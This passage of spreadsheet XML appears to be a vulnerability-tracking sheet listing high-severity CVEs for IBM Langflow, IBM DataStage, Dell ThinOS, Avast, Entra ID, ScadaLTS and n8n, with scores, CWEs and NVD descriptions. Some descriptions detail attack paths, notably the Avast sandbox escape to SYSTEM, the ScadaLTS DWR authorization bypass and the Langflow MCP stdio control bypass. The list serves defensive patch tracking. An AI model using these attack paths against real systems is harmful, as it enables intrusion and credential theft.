      <c r="E191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F191" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr"/>
      <c r="K191" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L191" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr"/>
      <c r="Q191" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R191" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute arbitrary code due to an unguarded eval() call on attacker-controlled input.</t>
        </is>
      </c>
      <c r="S191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78571</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78575</t>
        </is>
      </c>
      <c r="D192" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F192" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr"/>
      <c r="K192" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L192" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr"/>
      <c r="Q192" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R192" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute arbitrary commands due to improper validation of command-line arguments in the MCP stdio server configuration.</t>
        </is>
      </c>
      <c r="S192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78575</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79742</t>
        </is>
      </c>
      <c r="D193" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F193" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr"/>
      <c r="K193" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L193" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr"/>
      <c r="Q193" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R193" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute arbitrary code due to an incomplete environment variable blocklist.</t>
        </is>
      </c>
      <c r="S193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79742</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81048</t>
        </is>
      </c>
      <c r="D194" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr"/>
      <c r="K194" s="5" t="inlineStr">
        <is>
          <t>dell:latitude_3330, dell:latitude_3420, dell:latitude_3440, dell:latitude_3450, dell:latitude_5440, dell:latitude_5450, dell:latitude_5520, dell:latitude_5530, dell:latitude_5540, dell:latitude_5550</t>
        </is>
      </c>
      <c r="L194" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr"/>
      <c r="Q194" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R194" s="5" t="inlineStr">
        <is>
          <t>Dell ThinOS 10, versions prior to 2605_10.2616, contain an Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability. An unauthenticated attacker with adjacent network access could potentially exploit this vulnerability, leading to Remote Code execution</t>
        </is>
      </c>
      <c r="S194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81048</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81211</t>
        </is>
      </c>
      <c r="D195" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr"/>
      <c r="K195" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L195" s="5" t="inlineStr"/>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr"/>
      <c r="Q195" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R195" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute arbitrary Python code due to improper authorization of custom components in stored flows.</t>
        </is>
      </c>
      <c r="S195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81211</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81550</t>
        </is>
      </c>
      <c r="D196" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr"/>
      <c r="K196" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L196" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr"/>
      <c r="Q196" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R196" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to execute arbitrary code due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="S196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81550</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81940</t>
        </is>
      </c>
      <c r="D197" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr"/>
      <c r="K197" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L197" s="5" t="inlineStr"/>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr"/>
      <c r="Q197" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R197" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute arbitrary code due to improper neutralization of special characters in flow display names.</t>
        </is>
      </c>
      <c r="S197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81940</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81941</t>
        </is>
      </c>
      <c r="D198" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr"/>
      <c r="K198" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L198" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr"/>
      <c r="Q198" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R198" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 allows an authenticated non-administrative user could execute arbitrary operating system commands on the server at the privilege level of the application process by constructing a flow with an MCP Tools component configured to use a local stdio subprocess transport. This bypasses both the LANGFLOW_CUSTOM_COMPONENT_ADMIN_ONLY and LANGFLOW_BLOCK_CODE_INTERPRETER_COMPONENTS server-side controls intended to prevent exactly this class of access. Successful exploitation could lead to arbitrary command execution, sensitive data exposure (including credentials from the process environment), file system modification, and lateral movement to services reachable from the server.</t>
        </is>
      </c>
      <c r="S198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81941</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82095</t>
        </is>
      </c>
      <c r="D199" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F199" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr"/>
      <c r="K199" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L199" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr"/>
      <c r="Q199" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R199" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to execute arbitrary code due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="S199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82095</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82097</t>
        </is>
      </c>
      <c r="D200" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F200" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr"/>
      <c r="K200" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L200" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr"/>
      <c r="Q200" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R200" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to execute arbitrary code due to a Server-Side Request Forgery (SSRF) vulnerability.</t>
        </is>
      </c>
      <c r="S200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82097</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82098</t>
        </is>
      </c>
      <c r="D201" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr"/>
      <c r="K201" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L201" s="5" t="inlineStr"/>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr"/>
      <c r="Q201" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R201" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to execute arbitrary commands due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="S201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82098</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82099</t>
        </is>
      </c>
      <c r="D202" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr"/>
      <c r="K202" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L202" s="5" t="inlineStr"/>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr"/>
      <c r="Q202" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R202" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to execute arbitrary code due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="S202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82099</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82964</t>
        </is>
      </c>
      <c r="D203" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>security@nortonlifelock.com</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="inlineStr"/>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr"/>
      <c r="K203" s="5" t="inlineStr"/>
      <c r="L203" s="5" t="inlineStr"/>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr"/>
      <c r="Q203" s="5" t="inlineStr">
        <is>
          <t>CWE-281, CWE-653, CWE-862</t>
        </is>
      </c>
      <c r="R203" s="5" t="inlineStr">
        <is>
          <t>Improper preservation of permissions in the Avast sandbox minifilter driver (aswSnx.sys) on Windows allows a local, low-privileged attacker executing inside the sandbox to escape file isolation and escalate to SYSTEM.
When the sandbox virtualizes a file it copies the original security descriptor, but the driver opened the virtualization target object with GENERIC_WRITE and FILE_WRITE_ATTRIBUTES only, omitting WRITE_DAC. Every attempt to apply the original DACL therefore failed, and the failure was discarded silently, leaving virtualized copies of sensitive files with permissive permissions. Because the IRP_MJ_CREATE callback additionally did not strip WRITE_DAC for sensitive directories, a sandboxed process could rewrite the security descriptor of a virtualized object, read the virtualized copy of the SAM database, extract local NTLM password hashes and execute code as SYSTEM.
The absence of an IRP_MJ_SET_SECURITY callback in the driver's operation registration table is a related defense-in-depth gap, but it is not the control that prevents this attack.</t>
        </is>
      </c>
      <c r="S203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82964</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83941</t>
        </is>
      </c>
      <c r="D204" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr"/>
      <c r="K204" s="5" t="inlineStr">
        <is>
          <t>microsoft:entra_id</t>
        </is>
      </c>
      <c r="L204" s="5" t="inlineStr"/>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr"/>
      <c r="Q204" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R204" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Entra ID allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83941</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84858</t>
        </is>
      </c>
      <c r="D205" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F205" s="5" t="inlineStr">
        <is>
          <t>vulnreport@tenable.com</t>
        </is>
      </c>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="inlineStr"/>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr"/>
      <c r="K205" s="5" t="inlineStr"/>
      <c r="L205" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr"/>
      <c r="Q205" s="5" t="inlineStr"/>
      <c r="R205" s="5" t="inlineStr">
        <is>
          <t>ScadaLTS 2.8.1-release-candidate build 0 is affected by an Authenticated Remote Code Execution via Scripting Sandbox Bypass
The DWR "DataSourceEditDwr" class exposes the "validateScript" method that compiles and executes attacker-supplied JavaScript via the Rhino scripting engine. There are no authorization checks on this method and so it is possible for an attacker with access to a low privilege user to abuse this flaw by leveraging the DWR routing bypass.</t>
        </is>
      </c>
      <c r="S205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84858</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84860</t>
        </is>
      </c>
      <c r="D206" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>vulnreport@tenable.com</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="inlineStr"/>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K206" s="5" t="inlineStr"/>
      <c r="L206" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr"/>
      <c r="Q206" s="5" t="inlineStr"/>
      <c r="R206" s="5" t="inlineStr">
        <is>
          <t>ScadaLTS 2.8.1-release-candidate build 0 is affected by an Authorization Bypass
Spring Security gates DWR endpoints by URL path pattern, but DWR itself dispatches method calls based on the POST body parameters c0-scriptName and c0-methodName. The crossDomainSessionSecurity setting in web.xml is set to false, which disables DWR's built-in origin validation. This means any authenticated user can invoke any DWR method (regardless of the URL-based access control) by sending their request to a URL they are permitted to access (e.g. MiscDwr.initializeLongPoll.dwr) while targeting a restricted class in the POST body.
This is the systemic root cause that enables multiple other findings to be exploited as a low privilege user.</t>
        </is>
      </c>
      <c r="S206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84860</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85168</t>
        </is>
      </c>
      <c r="D207" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E207" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr"/>
      <c r="K207" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="L207" s="5" t="inlineStr"/>
      <c r="M207" s="5" t="inlineStr"/>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr"/>
      <c r="Q207" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
